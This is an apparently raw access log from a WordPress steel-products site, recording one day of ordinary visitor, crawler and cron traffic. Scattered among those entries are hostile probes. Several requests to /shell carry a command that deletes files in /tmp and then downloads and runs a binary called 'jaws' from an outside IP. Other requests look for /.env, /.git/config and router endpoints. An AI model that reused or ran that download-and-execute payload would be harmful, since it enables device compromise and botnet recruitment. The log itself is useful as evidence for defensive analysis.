183.227.253.157 - - [04/Jun/2026:15:20:48 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=4 HTTP/1.1" 200 2580 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36 Edg/148.0.0.0"
183.227.253.157 - - [04/Jun/2026:15:20:48 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled.webp HTTP/1.1" 200 197360 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36 Edg/148.0.0.0"
183.227.253.157 - - [04/Jun/2026:15:20:48 +0800] "GET /wp-content/uploads/2026/01/1768276119-qizhoujiagong_Slider_3840%C3%972160_20260113-scaled.webp HTTP/1.1" 200 131696 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36 Edg/148.0.0.0"
36.133.115.36 - - [04/Jun/2026:15:23:28 +0800] "POST /wp-cron.php?doing_wp_cron=1780557808.8352489471435546875000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
223.91.28.133 - - [04/Jun/2026:15:23:28 +0800] "GET /portfolio-category/cold-rolled-coil/ HTTP/1.1" 404 9410 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36"
205.169.39.20 - - [04/Jun/2026:15:35:32 +0800] "GET / HTTP/1.1" 200 35636 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.20 - - [04/Jun/2026:15:35:41 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
103.156.233.21 - - [04/Jun/2026:15:38:27 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
36.133.115.36 - - [04/Jun/2026:15:38:28 +0800] "POST /wp-cron.php?doing_wp_cron=1780558708.2348461151123046875000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
36.133.115.36 - - [04/Jun/2026:15:49:53 +0800] "POST /wp-cron.php?doing_wp_cron=1780559393.9450800418853759765625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
36.133.108.125 - - [04/Jun/2026:15:49:53 +0800] "HEAD /.env HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; fr-ch) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4"
170.83.239.91 - - [04/Jun/2026:16:05:01 +0800] "GET /about HTTP/1.1" 200 25029 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0"
45.41.104.51 - - [04/Jun/2026:16:09:12 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
36.133.115.36 - - [04/Jun/2026:16:09:12 +0800] "POST /wp-cron.php?doing_wp_cron=1780560552.9272069931030273437500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
36.133.115.36 - - [04/Jun/2026:16:17:17 +0800] "POST /wp-cron.php?doing_wp_cron=1780561037.8734989166259765625000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
192.142.24.66 - - [04/Jun/2026:16:17:17 +0800] "GET /SDK/webLanguage HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Jun/2026:16:42:38 +0800] "POST /wp-cron.php?doing_wp_cron=1780562558.6667358875274658203125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
220.181.108.165 - - [04/Jun/2026:16:42:38 +0800] "GET / HTTP/1.1" 200 35195 "-" "Mozilla/5.0 (Linux;u;Android 4.2.2;zh-cn;) AppleWebKit/534.46 (KHTML,like Gecko) Version/5.1 Mobile Safari/10600.6.3 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
116.179.37.6 - - [04/Jun/2026:16:47:00 +0800] "GET /wp-content/uploads/2026/05/1779328461-1Article_images_W900px-768x432.webp HTTP/1.1" 200 37678 "http://cqqizhou.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
47.74.40.143 - - [04/Jun/2026:16:47:43 +0800] "GET / HTTP/1.1" 499 0 "-" "curl/7.78.0"
36.133.115.36 - - [04/Jun/2026:16:47:43 +0800] "POST /wp-cron.php?doing_wp_cron=1780562863.7970910072326660156250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
36.133.115.36 - - [04/Jun/2026:17:00:24 +0800] "POST /wp-cron.php?doing_wp_cron=1780563624.3013119697570800781250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
167.71.73.45 - - [04/Jun/2026:17:00:24 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"
36.133.115.36 - - [04/Jun/2026:17:04:57 +0800] "POST /wp-cron.php?doing_wp_cron=1780563897.1486339569091796875000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
43.159.128.155 - - [04/Jun/2026:17:04:57 +0800] "GET / HTTP/1.1" 200 35195 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
14.192.213.27 - - [04/Jun/2026:17:10:51 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
36.133.115.36 - - [04/Jun/2026:17:10:52 +0800] "POST /wp-cron.php?doing_wp_cron=1780564252.2635340690612792968750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
36.133.115.36 - - [04/Jun/2026:17:21:05 +0800] "POST /wp-cron.php?doing_wp_cron=1780564865.1926729679107666015625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
223.84.10.104 - - [04/Jun/2026:17:21:05 +0800] "GET /portfolio-tag/ansteel-thyssen/ HTTP/1.1" 404 9411 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"
36.133.115.36 - - [04/Jun/2026:17:27:13 +0800] "POST /wp-cron.php?doing_wp_cron=1780565233.8318519592285156250000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
45.148.10.67 - - [04/Jun/2026:17:27:13 +0800] "GET / HTTP/1.1" 200 35195 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
117.183.110.112 - - [04/Jun/2026:17:28:38 +0800] "GET /news/2214 HTTP/1.1" 200 26405 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36"
36.133.115.36 - - [04/Jun/2026:17:31:08 +0800] "POST /wp-cron.php?doing_wp_cron=1780565468.2453250885009765625000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
34.165.115.195 - - [04/Jun/2026:17:31:08 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Linux; Android 9; Mi A2 Lite) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36"
34.165.115.195 - - [04/Jun/2026:17:31:10 +0800] "GET / HTTP/1.1" 200 35195 "http://36.133.115.36:80" "Mozilla/5.0 (Linux; Android 9; Mi A2 Lite) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36"
36.133.115.36 - - [04/Jun/2026:18:02:30 +0800] "POST /wp-cron.php?doing_wp_cron=1780567349.9691710472106933593750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
166.88.26.189 - - [04/Jun/2026:18:02:30 +0800] "GET /nacos/ HTTP/1.1" 404 9411 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0"
180.153.236.80 - - [04/Jun/2026:18:04:51 +0800] "GET / HTTP/1.1" 200 35636 "http://cqqizhou.com/" "User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0; 360Spider"
36.133.115.36 - - [04/Jun/2026:18:07:23 +0800] "POST /wp-cron.php?doing_wp_cron=1780567643.1437849998474121093750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
176.65.139.129 - - [04/Jun/2026:18:07:23 +0800] "GET / HTTP/1.1" 200 158680 "http://36.133.115.36:80/cgi-bin/index2.asp" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [04/Jun/2026:18:08:17 +0800] "POST /wp-cron.php?doing_wp_cron=1780567697.3285059928894042968750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
47.128.31.102 - - [04/Jun/2026:18:08:17 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
223.74.122.230 - - [04/Jun/2026:18:11:12 +0800] "GET / HTTP/1.1" 200 35636 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.105"
36.133.115.36 - - [04/Jun/2026:18:11:12 +0800] "POST /wp-cron.php?doing_wp_cron=1780567872.8856639862060546875000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
106.92.106.6 - - [04/Jun/2026:18:11:12 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.33"
106.92.106.6 - - [04/Jun/2026:18:11:13 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 35636 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.33"
36.133.115.36 - - [04/Jun/2026:18:21:13 +0800] "POST /wp-cron.php?doing_wp_cron=1780568473.8694190979003906250000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
176.65.139.129 - - [04/Jun/2026:18:21:19 +0800] "GET / HTTP/1.1" 200 158680 "http://36.133.115.36:80/cgi-bin/index2.asp" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [04/Jun/2026:18:24:58 +0800] "POST /wp-cron.php?doing_wp_cron=1780568698.7544860839843750000000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
66.240.223.208 - - [04/Jun/2026:18:24:58 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [04/Jun/2026:18:40:53 +0800] "POST /wp-cron.php?doing_wp_cron=1780569653.0998480319976806640625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
39.144.224.12 - - [04/Jun/2026:18:40:53 +0800] "GET /2339/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Linux; Android 16; PJE110 Build/TP1A.220905.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/146.0.7680.178 Mobile Safari/537.36 XWEB/1460093 MMWEBSDK/20260502 MMWEBID/8832 REV/4843ebe11ecd759196310a3df45633a796c09f5b MicroMessenger/8.0.72.3100(0x28004850) WeChat/arm64 Weixin NetType/5G Language/zh_CN ABI/arm64"
39.144.224.12 - - [04/Jun/2026:18:40:54 +0800] "GET /news/2339 HTTP/1.1" 200 21097 "-" "Mozilla/5.0 (Linux; Android 16; PJE110 Build/TP1A.220905.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/146.0.7680.178 Mobile Safari/537.36 XWEB/1460093 MMWEBSDK/20260502 MMWEBID/8832 REV/4843ebe11ecd759196310a3df45633a796c09f5b MicroMessenger/8.0.72.3100(0x28004850) WeChat/arm64 Weixin NetType/5G Language/zh_CN ABI/arm64"
39.144.224.12 - - [04/Jun/2026:18:40:54 +0800] "GET /wp-content/uploads/2025/12/1765891413-20251209103501.webp HTTP/1.1" 200 24878 "http://cqqizhou.com/news/2339" "Mozilla/5.0 (Linux; Android 16; PJE110 Build/TP1A.220905.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/146.0.7680.178 Mobile Safari/537.36 XWEB/1460093 MMWEBSDK/20260502 MMWEBID/8832 REV/4843ebe11ecd759196310a3df45633a796c09f5b MicroMessenger/8.0.72.3100(0x28004850) WeChat/arm64 Weixin NetType/5G Language/zh_CN ABI/arm64"
39.144.224.12 - - [04/Jun/2026:18:40:54 +0800] "GET /wp-content/uploads/2025/12/1765248735-20251209104226_108_60.webp HTTP/1.1" 200 55962 "http://cqqizhou.com/news/2339" "Mozilla/5.0 (Linux; Android 16; PJE110 Build/TP1A.220905.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/146.0.7680.178 Mobile Safari/537.36 XWEB/1460093 MMWEBSDK/20260502 MMWEBID/8832 REV/4843ebe11ecd759196310a3df45633a796c09f5b MicroMessenger/8.0.72.3100(0x28004850) WeChat/arm64 Weixin NetType/5G Language/zh_CN ABI/arm64"
39.144.224.12 - - [04/Jun/2026:18:40:54 +0800] "GET /wp-content/uploads/2025/12/1765248770-20251209104226_107_60.webp HTTP/1.1" 200 66916 "http://cqqizhou.com/news/2339" "Mozilla/5.0 (Linux; Android 16; PJE110 Build/TP1A.220905.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/146.0.7680.178 Mobile Safari/537.36 XWEB/1460093 MMWEBSDK/20260502 MMWEBID/8832 REV/4843ebe11ecd759196310a3df45633a796c09f5b MicroMessenger/8.0.72.3100(0x28004850) WeChat/arm64 Weixin NetType/5G Language/zh_CN ABI/arm64"
39.144.224.12 - - [04/Jun/2026:18:40:54 +0800] "GET /wp-content/uploads/2026/05/1779957408-1Article_images_W900px.webp HTTP/1.1" 200 36526 "http://cqqizhou.com/news/2339" "Mozilla/5.0 (Linux; Android 16; PJE110 Build/TP1A.220905.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/146.0.7680.178 Mobile Safari/537.36 XWEB/1460093 MMWEBSDK/20260502 MMWEBID/8832 REV/4843ebe11ecd759196310a3df45633a796c09f5b MicroMessenger/8.0.72.3100(0x28004850) WeChat/arm64 Weixin NetType/5G Language/zh_CN ABI/arm64"
39.144.224.12 - - [04/Jun/2026:18:40:54 +0800] "GET /wp-content/uploads/2025/07/1753410289-News2000%C3%97400_202571.webp HTTP/1.1" 200 17830 "http://cqqizhou.com/news/2339" "Mozilla/5.0 (Linux; Android 16; PJE110 Build/TP1A.220905.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/146.0.7680.178 Mobile Safari/537.36 XWEB/1460093 MMWEBSDK/20260502 MMWEBID/8832 REV/4843ebe11ecd759196310a3df45633a796c09f5b MicroMessenger/8.0.72.3100(0x28004850) WeChat/arm64 Weixin NetType/5G Language/zh_CN ABI/arm64"
39.144.224.12 - - [04/Jun/2026:18:40:54 +0800] "GET /wp-content/uploads/2026/06/1780362799-1Article_images_W900px.webp HTTP/1.1" 200 61690 "http://cqqizhou.com/news/2339" "Mozilla/5.0 (Linux; Android 16; PJE110 Build/TP1A.220905.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/146.0.7680.178 Mobile Safari/537.36 XWEB/1460093 MMWEBSDK/20260502 MMWEBID/8832 REV/4843ebe11ecd759196310a3df45633a796c09f5b MicroMessenger/8.0.72.3100(0x28004850) WeChat/arm64 Weixin NetType/5G Language/zh_CN ABI/arm64"
39.144.224.12 - - [04/Jun/2026:18:40:54 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/news/2339" "Mozilla/5.0 (Linux; Android 16; PJE110 Build/TP1A.220905.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/146.0.7680.178 Mobile Safari/537.36 XWEB/1460093 MMWEBSDK/20260502 MMWEBID/8832 REV/4843ebe11ecd759196310a3df45633a796c09f5b MicroMessenger/8.0.72.3100(0x28004850) WeChat/arm64 Weixin NetType/5G Language/zh_CN ABI/arm64"
39.144.224.12 - - [04/Jun/2026:18:40:54 +0800] "GET /wp-content/uploads/2025/12/1765249046-20251209104228_110_60.webp HTTP/1.1" 200 64834 "http://cqqizhou.com/news/2339" "Mozilla/5.0 (Linux; Android 16; PJE110 Build/TP1A.220905.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/146.0.7680.178 Mobile Safari/537.36 XWEB/1460093 MMWEBSDK/20260502 MMWEBID/8832 REV/4843ebe11ecd759196310a3df45633a796c09f5b MicroMessenger/8.0.72.3100(0x28004850) WeChat/arm64 Weixin NetType/5G Language/zh_CN ABI/arm64"
36.133.115.36 - - [04/Jun/2026:18:52:22 +0800] "POST /wp-cron.php?doing_wp_cron=1780570342.7609679698944091796875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
162.14.81.106 - - [04/Jun/2026:18:52:22 +0800] "GET / HTTP/1.1" 200 35195 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [04/Jun/2026:18:56:28 +0800] "POST /wp-cron.php?doing_wp_cron=1780570588.5030651092529296875000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
43.130.31.17 - - [04/Jun/2026:18:56:28 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.130.31.17 - - [04/Jun/2026:18:56:30 +0800] "GET / HTTP/1.1" 200 35194 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [04/Jun/2026:19:00:04 +0800] "POST /wp-cron.php?doing_wp_cron=1780570804.2251729965209960937500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
77.83.39.94 - - [04/Jun/2026:19:00:04 +0800] "GET /.git/config HTTP/1.1" 404 9412 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
36.133.115.36 - - [04/Jun/2026:19:03:29 +0800] "POST /wp-cron.php?doing_wp_cron=1780571009.8254508972167968750000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
39.100.74.204 - - [04/Jun/2026:19:03:29 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
39.100.74.204 - - [04/Jun/2026:19:03:40 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
39.100.74.204 - - [04/Jun/2026:19:03:41 +0800] "GET /nmaplowercheck1780571010 HTTP/1.1" 404 32979 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
39.100.74.204 - - [04/Jun/2026:19:03:41 +0800] "POST /sdk HTTP/1.1" 404 32979 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
39.100.74.204 - - [04/Jun/2026:19:03:42 +0800] "GET /evox/about HTTP/1.1" 404 32979 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
39.100.74.204 - - [04/Jun/2026:19:03:42 +0800] "GET /HNAP1 HTTP/1.1" 404 32979 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
39.100.74.204 - - [04/Jun/2026:19:04:01 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
39.100.74.204 - - [04/Jun/2026:19:04:01 +0800] "GET / HTTP/1.1" 301 5 "-" "-"
116.132.218.20 - - [04/Jun/2026:19:07:33 +0800] "GET /club HTTP/1.1" 200 12541 "-" "YisouSpider"
36.133.115.36 - - [04/Jun/2026:19:21:54 +0800] "POST /wp-cron.php?doing_wp_cron=1780572113.9734909534454345703125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
111.225.149.201 - - [04/Jun/2026:19:21:54 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
36.133.115.36 - - [04/Jun/2026:19:28:58 +0800] "POST /wp-cron.php?doing_wp_cron=1780572538.6390879154205322265625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
119.84.246.117 - - [04/Jun/2026:19:28:58 +0800] "GET / HTTP/1.1" 301 5 "-" "-"
119.84.246.117 - - [04/Jun/2026:19:28:58 +0800] "GET / HTTP/1.1" 200 160339 "-" "-"
119.84.246.117 - - [04/Jun/2026:19:29:00 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1"
119.84.246.117 - - [04/Jun/2026:19:29:00 +0800] "GET / HTTP/1.1" 200 35636 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1"
119.84.246.117 - - [04/Jun/2026:19:29:00 +0800] "GET /wp-content/uploads/2025/07/1753453096-%E5%8F%8C%E7%9B%B8%E9%92%A2product_Single600%C3%97284.webp HTTP/1.1" 200 14562 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1"
119.84.246.117 - - [04/Jun/2026:19:29:00 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1"
119.84.246.117 - - [04/Jun/2026:19:29:00 +0800] "GET /wp-content/uploads/2025/07/1753456723-%E5%8F%8C%E7%9B%B8%E9%92%A2roduct_Single600.webp HTTP/1.1" 200 22790 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1"
119.84.246.117 - - [04/Jun/2026:19:29:00 +0800] "GET /wp-content/uploads/2025/07/1753456770-%E7%83%AD%E9%95%80%E9%94%8C%E5%8D%B7product_Single600.webp HTTP/1.1" 200 27502 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1"
119.84.246.117 - - [04/Jun/2026:19:29:00 +0800] "GET /wp-content/uploads/2025/07/1753453127-%E4%BD%99%E5%8D%B7product_Single600%C3%97284.webp HTTP/1.1" 200 18744 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1"
119.84.246.117 - - [04/Jun/2026:19:29:00 +0800] "GET /wp-content/uploads/2026/06/1780362799-1Article_images_W900px.webp HTTP/1.1" 200 61690 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1"
119.84.246.117 - - [04/Jun/2026:19:29:00 +0800] "GET /wp-content/uploads/2026/06/1780363378-1Article_images_W900px.webp HTTP/1.1" 200 62100 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1"
119.84.246.117 - - [04/Jun/2026:19:29:01 +0800] "GET /wp-content/uploads/2026/05/1779925245-Article_images_W900px.webp HTTP/1.1" 200 27996 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1"
119.84.246.117 - - [04/Jun/2026:19:29:01 +0800] "GET /wp-content/uploads/2026/05/1779957408-1Article_images_W900px.webp HTTP/1.1" 200 36526 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1"
119.84.246.117 - - [04/Jun/2026:19:29:01 +0800] "GET /wp-content/uploads/2026/05/1779328461-1Article_images_W900px.webp HTTP/1.1" 200 37908 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1"
36.133.115.36 - - [04/Jun/2026:19:30:18 +0800] "POST /wp-cron.php?doing_wp_cron=1780572618.3151750564575195312500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
119.84.246.117 - - [04/Jun/2026:19:30:18 +0800] "GET / HTTP/1.1" 301 5 "-" "-"
119.84.246.117 - - [04/Jun/2026:19:30:18 +0800] "GET / HTTP/1.1" 200 160339 "-" "-"
119.84.246.117 - - [04/Jun/2026:19:30:20 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1"
119.84.246.117 - - [04/Jun/2026:19:30:20 +0800] "GET / HTTP/1.1" 200 35636 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1"
119.84.246.117 - - [04/Jun/2026:19:30:20 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1"
119.84.246.117 - - [04/Jun/2026:19:30:20 +0800] "GET /wp-content/uploads/2025/07/1753456723-%E5%8F%8C%E7%9B%B8%E9%92%A2roduct_Single600.webp HTTP/1.1" 200 22790 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1"
119.84.246.117 - - [04/Jun/2026:19:30:20 +0800] "GET /wp-content/uploads/2025/07/1753453096-%E5%8F%8C%E7%9B%B8%E9%92%A2product_Single600%C3%97284.webp HTTP/1.1" 200 14562 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1"
119.84.246.117 - - [04/Jun/2026:19:30:20 +0800] "GET /wp-content/uploads/2025/07/1753456770-%E7%83%AD%E9%95%80%E9%94%8C%E5%8D%B7product_Single600.webp HTTP/1.1" 200 27502 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1"
119.84.246.117 - - [04/Jun/2026:19:30:20 +0800] "GET /wp-content/uploads/2026/06/1780363378-1Article_images_W900px.webp HTTP/1.1" 200 62100 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1"
119.84.246.117 - - [04/Jun/2026:19:30:20 +0800] "GET /wp-content/uploads/2025/07/1753453127-%E4%BD%99%E5%8D%B7product_Single600%C3%97284.webp HTTP/1.1" 200 18744 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1"
